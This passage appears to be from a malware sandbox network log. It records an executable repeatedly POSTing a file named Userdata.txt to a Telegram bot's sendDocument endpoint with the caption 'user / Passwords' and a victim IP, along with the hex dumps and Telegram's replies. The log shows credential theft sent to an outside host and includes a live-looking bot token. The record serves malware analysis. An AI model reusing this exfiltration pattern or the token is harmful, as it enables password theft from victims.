2025-01-10 21:31:47 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 37 30 38 31 64 30 61 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31d7081d0af9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:47 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:48 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43577,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544707,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.3	49990	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:49 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31e63d9f7e32 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:49 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 36 33 64 39 66 37 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31e63d9f7e32Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:49 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:49 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43578,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544709,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.3	49992	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:51 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31fc4d4fd6e7 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 63 34 64 34 66 64 36 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31fc4d4fd6e7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:51 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:51 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43579,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544711,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.3	49994	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:52 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3210ec87651f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:52 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 30 65 63 38 37 36 35 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3210ec87651fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:53 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:53 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43580,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544713,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.3	49996	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:54 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3222bf0eb193 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:54 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 32 62 66 30 65 62 31 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3222bf0eb193Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:54 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:54 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43581,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544714,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.3	49998	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:56 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32389e6415d8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:56 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 38 39 65 36 34 31 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32389e6415d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:56 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:56 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43582,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544716,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.3	50000	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:58 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd324d101c9dc9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:58 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 64 31 30 31 63 39 64 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd324d101c9dc9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:58 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:58 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43583,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544718,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.3	50002	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:59 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd326016923807 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:59 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 30 31 36 39 32 33 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd326016923807Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:00 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
